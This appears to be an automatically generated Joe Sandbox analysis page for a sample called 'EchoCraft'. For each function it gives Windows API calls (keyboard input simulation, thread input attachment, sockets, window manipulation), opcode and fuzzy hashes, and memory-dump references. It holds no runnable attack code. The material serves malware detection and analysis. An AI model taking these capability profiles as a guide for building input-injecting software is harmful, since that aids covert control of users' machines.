Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: f3f65af94f19d9b694364af832d3a6597f1aec2f30120d5ee0c0dd326d2babcd
Instruction ID: 3eba6551e32cc647d65cbc9969730152e325c95903bc734afced995fd5aac686
Opcode Fuzzy Hash: f3f65af94f19d9b694364af832d3a6597f1aec2f30120d5ee0c0dd326d2babcd
Instruction Fuzzy Hash: 3211B7B66002456BCF017F718D89AEE77BA9F44304F044075BD0997292DF305A45CB70

Function 00AE089E Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96b6d01935366e3d145205ab20b05b3168e623b35c9a2a3aedcb391c8fd7c91d
Instruction ID: 540879750a0860435203aa29dba29630c64566bd71b9c9bd64113904d729f290
Opcode Fuzzy Hash: 96b6d01935366e3d145205ab20b05b3168e623b35c9a2a3aedcb391c8fd7c91d
Instruction Fuzzy Hash: 9AC17E75A0025AEFDB04CFA9C884EAEB7B5FF48704F108598E505EB251D771EE82CB90

Function 00AB42A0 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00AB432B
__alldvrm.LIBCMT ref: 00AB452C
__alldvrm.LIBCMT ref: 00AB454E

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 0f15e075493e165e9e85f7943bbbd64d7fc54b6e91e2075080d8186ad8ef2b79
Instruction ID: 26ae8aa6533bf43622cb7c56cec23e6263ea341ccead5da8df0a5ee20a3efc86
Opcode Fuzzy Hash: 0f15e075493e165e9e85f7943bbbd64d7fc54b6e91e2075080d8186ad8ef2b79
Instruction Fuzzy Hash: 7CA125729047869FEB21CF68C891BFEBBE9EF59310F18426DE5959B283C6388D41C750

Function 00B03C01 Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00B03C2C
CoUninitialize.OLE32 ref: 00B03C36
VariantInit.OLEAUT32(?), ref: 00B03C41
VariantClear.OLEAUT32(?), ref: 00B03EEE

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: 2c41b1aa5718c0c49e851fbb60d5eefff746b804e37c872ae8ec77650baf2e70
Instruction ID: c44a64740e047353a6def32a62ce2cd5bc70271a2c359120adf1d0badbab6ee5
Opcode Fuzzy Hash: 2c41b1aa5718c0c49e851fbb60d5eefff746b804e37c872ae8ec77650baf2e70
Instruction Fuzzy Hash: 92A12E756047019FC710EF24C585E2ABBE9FF48B60F048599F98A9B3A1DB30EE01CB65

Function 00AE0C55 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00B20BCC,?), ref: 00AE0E0F
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00B20BCC,?), ref: 00AE0E27
CLSIDFromProgID.OLE32(?,?,00000000,00B1DC00,000000FF,?,00000000,00000800,00000000,?,00B20BCC,?), ref: 00AE0E4C
_memcmp.LIBVCRUNTIME ref: 00AE0E6D

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 0e45df04b26aa1d4b680294e1c7575e61c87656a3091b4dfbf58fefc20efd44b
Instruction ID: f60ff691d236f541653d9ce996e278f37ffdda0f3a313a4e2155cde13c54e44a
Opcode Fuzzy Hash: 0e45df04b26aa1d4b680294e1c7575e61c87656a3091b4dfbf58fefc20efd44b
Instruction Fuzzy Hash: D7810971A00109EFCB04DFD9C984EEEB7B9FF89315F204598E506AB250DB71AE46CB60

Function 00AC17B1 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00AC18E0

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 55e9424aabc26bb68af52008b94ee7320c036f0f5d91a4e67667f07bbf583318
Instruction ID: 5041c763de295ac32bc136330c83e09570db4b22965f5ca137957fd206ddbda1
Opcode Fuzzy Hash: 55e9424aabc26bb68af52008b94ee7320c036f0f5d91a4e67667f07bbf583318
Instruction Fuzzy Hash: DA410531B046006BDB217BBD8D46FEF3AB9EF43370F564A1AF918D6293DA3488418761

Function 00B0231C Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00B02343
WSAGetLastError.WSOCK32 ref: 00B02351
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00B023D0
WSAGetLastError.WSOCK32 ref: 00B023DA

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: ec168d2db9be793e9e780f6e56f7448c747a730144d54cecc3e01104383f913d
Instruction ID: 20175034949866be729146c1a6e8a6e58da6028f8f412b77fedeab591c5997b0
Opcode Fuzzy Hash: ec168d2db9be793e9e780f6e56f7448c747a730144d54cecc3e01104383f913d
Instruction Fuzzy Hash: 3541A074600200AFE720AF24C986F6A7BE5EB04718F54C098FA5A9F7D2D776DD42CB90

Function 00B168ED Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00B16957
ScreenToClient.USER32(?,?), ref: 00B1698A
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00B169F7

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 73cc186d306e21fb51bd9ce80237ec9e3b5844d1019d388c8b6845089d9ce5aa
Instruction ID: a0266f4b4623411ba4e938a0646b627dd83ebfd36cfdec823f81934b81b77757
Opcode Fuzzy Hash: 73cc186d306e21fb51bd9ce80237ec9e3b5844d1019d388c8b6845089d9ce5aa
Instruction Fuzzy Hash: 61510975A00209EFCF14DF64C981AEE7BF6FF45360F5081A9E955972A0D731AD81CB90

Function 00ABB83F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1da390dc6626f3d4cd0b793700fa709544a828f12bae2ce6fa36b9e6d5fdf3fb
Instruction ID: fdc3ec49b288fe7facb2a015a10a094fd8578dcb24a27c331783d5cc712aa182
Opcode Fuzzy Hash: 1da390dc6626f3d4cd0b793700fa709544a828f12bae2ce6fa36b9e6d5fdf3fb
Instruction Fuzzy Hash: B841DA71A10704AFE725AF78CD41BEABBFDEB84710F10462EF151DB292D7B1994187A0

Function 00ABDCE3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00AA7191,00000000,00000000,00AA86F9,?,00AA86F9,?,00000001,00AA7191,8BE85006,00000001,00AA86F9,00AA86F9), ref: 00ABDD30
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00ABDDB9
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00ABDDCB
__freea.LIBCMT ref: 00ABDDD4

Part of subcall function 00AB3C40: RtlAllocateHeap.NTDLL(00000000,?,?,?,00AA0215,?,?,00AF1070,0000FFFF), ref: 00AB3C72

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: e779034290ac3e0f1fc4b93d3bc8565d0249775845349467387caf6384a66ff2
Instruction ID: 1365717c77e4774c675554632b5aed63a241e0f2e7caedee27d04ab1c578e6a6
Opcode Fuzzy Hash: e779034290ac3e0f1fc4b93d3bc8565d0249775845349467387caf6384a66ff2
Instruction Fuzzy Hash: 0631CF72A0121AABDF258F64DC85EEF7BA9EB41710F154268FC04D7192EB35CD60CB90

Function 00AEB27B Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00AEB2D0
SetKeyboardState.USER32(00000080), ref: 00AEB2EC
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00AEB35A
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00AEB3AC

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: a1b1ca055a2235bc134f939f39d77e18c76aab959f362e93869f96757c3f6926
Instruction ID: eaf7eda247552a103858472aae32c186354b573051133e96cd6e398d8a73a648
Opcode Fuzzy Hash: a1b1ca055a2235bc134f939f39d77e18c76aab959f362e93869f96757c3f6926
Instruction Fuzzy Hash: 62311630A60299AEEF31CB268C0E7FB7BB5AB45310F08821AE4945A5D0C3748E8197B1

Function 00B1599D Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 00B15A2E
GetWindowLongW.USER32(?,000000F0), ref: 00B15A51
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B15A5E
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B15A84

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: ac6b7d49fce211809c50c69545f58b690dd5541564f8d311597fba0de4f7e527
Instruction ID: 638b9f388277526743260915e4458e667263361df5f7becad53303582391ac20
Opcode Fuzzy Hash: ac6b7d49fce211809c50c69545f58b690dd5541564f8d311597fba0de4f7e527
Instruction Fuzzy Hash: 46318F34AF1A08EEEB359B14CCC6BE937A5EF85310F988292F611572E1C77469C09B51

Function 00AEB3C0 Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00AEB415
SetKeyboardState.USER32(00000080,?,00008000), ref: 00AEB431
PostMessageW.USER32(00000000,00000101,00000000), ref: 00AEB498
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00AEB4EA

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 2964d9af984f8b45ffd8c4a235de2d1b88c0c71ee87daa272a3b416bd4a10187
Instruction ID: dd35a2dd78ac25e7d7fc02dafdf461dcce830430c4247bf5a297e95b178f7d1e
Opcode Fuzzy Hash: 2964d9af984f8b45ffd8c4a235de2d1b88c0c71ee87daa272a3b416bd4a10187
Instruction Fuzzy Hash: C0312B30920698AEFF31CB66C80CBFB7BB5AF45314F44821AE495562D2D374898587B1

Function 00B17C5B Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00B17C81
GetWindowRect.USER32(?,?), ref: 00B17CF7
PtInRect.USER32(?,?,?), ref: 00B17D07
MessageBeep.USER32(00000000), ref: 00B17D73

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 8d4c57251cc5d6abfb22beb4f9470747e72225d6fd99bc5a22ccf08182660869
Instruction ID: e395a99c88cc1564abb6c1daa38134f8cecdd0b7d7024fd1cb6a7397432734db
Opcode Fuzzy Hash: 8d4c57251cc5d6abfb22beb4f9470747e72225d6fd99bc5a22ccf08182660869
Instruction Fuzzy Hash: 60416CB06452199FCB11CF58E884AE97BF5FF59314F9481F9E8159B361CB30A982CB90

Function 00B11DB4 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00B11DC5

Part of subcall function 00AE4251: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AE426B
Part of subcall function 00AE4251: GetCurrentThreadId.KERNEL32 ref: 00AE4272
Part of subcall function 00AE4251: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00AE2DB3), ref: 00AE4279

GetCaretPos.USER32(?), ref: 00B11DD9
ClientToScreen.USER32(00000000,?), ref: 00B11E26
GetForegroundWindow.USER32 ref: 00B11E2C

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 52e57827414cc0dfddde8df6f185bf4b60e4ea0450178b54b0e3a7c60cd451c5
Instruction ID: fd5d3aad9f22d83d5e2ddd9758228a1262581ac6addc1067d17919fc3764d2cb
Opcode Fuzzy Hash: 52e57827414cc0dfddde8df6f185bf4b60e4ea0450178b54b0e3a7c60cd451c5
Instruction Fuzzy Hash: D5315075D00149AFCB00EFA9C981CEEBBFDEF48304B5080A9E915E7651EB319E45CBA0

Function 00AEE75E Relevance: 6.1, APIs: 4, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 00A87A0C: _wcslen.LIBCMT ref: 00A87A11

_wcslen.LIBCMT ref: 00AEE794
_wcslen.LIBCMT ref: 00AEE7AB
_wcslen.LIBCMT ref: 00AEE7D6
GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00AEE7E1

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: _wcslen$ExtentPoint32Text
String ID:
API String ID: 3763101759-0
Opcode ID: 4736c95ade8b63ab184c6842c2a2fa967404d963f1d5d8262cf2ec77a0e069ad
Instruction ID: ac4bac897543e6da2abaa5666cd1252aed3a7bd1165d77ab1b8b57a0c31aada6
Opcode Fuzzy Hash: 4736c95ade8b63ab184c6842c2a2fa967404d963f1d5d8262cf2ec77a0e069ad
Instruction Fuzzy Hash: 8821B275D00214AFCB11EFA4C981BBEBBF9EF4A750F2441A5F804AB281D7709E41CBA1

Function 00B195D1 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A823E1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A823F2

GetCursorPos.USER32(?), ref: 00B19609
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00B1961E
GetCursorPos.USER32(?), ref: 00B19666
DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00B1969C

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 5199e1a651975712bfcceb7fe85ad1f76096e66785a98c5c205f2e83b867d11f
Instruction ID: 65aec6d48e38582d89520311e0ca522d82118f48b4011cc5c15a6a7b920f2487
Opcode Fuzzy Hash: 5199e1a651975712bfcceb7fe85ad1f76096e66785a98c5c205f2e83b867d11f
Instruction Fuzzy Hash: DA21F134501258EFDB258F94DCA8EFA7BF9FB8A310F9041A5F9054B261C7309D90DB60

Function 00AEDA23 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00B1DB10), ref: 00AEDA5D
GetLastError.KERNEL32 ref: 00AEDA6C
CreateDirectoryW.KERNEL32(?,00000000), ref: 00AEDA7B
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00B1DB10), ref: 00AEDAD8

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: b7af4596df447a67bb59c8c9944ac90edb7f3ea24949455b2b1cb973f7071d0c
Instruction ID: 279c6901a99c8b9bc33187bbbc3d329fc1adb615603d641379e1f13cee043099
Opcode Fuzzy Hash: b7af4596df447a67bb59c8c9944ac90edb7f3ea24949455b2b1cb973f7071d0c
Instruction Fuzzy Hash: AF21C77050D3419F8310EF29D9854AFB7E4FE563A4F104A6DF4A9C72A1DB30DA46CB82

Function 00B12E5C Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00B12EE4
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B12EFE
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B12F0C
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00B12F1A

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 15f17e21e664efd38ceba814702113c86c536698082507b566736fb04baeeaad
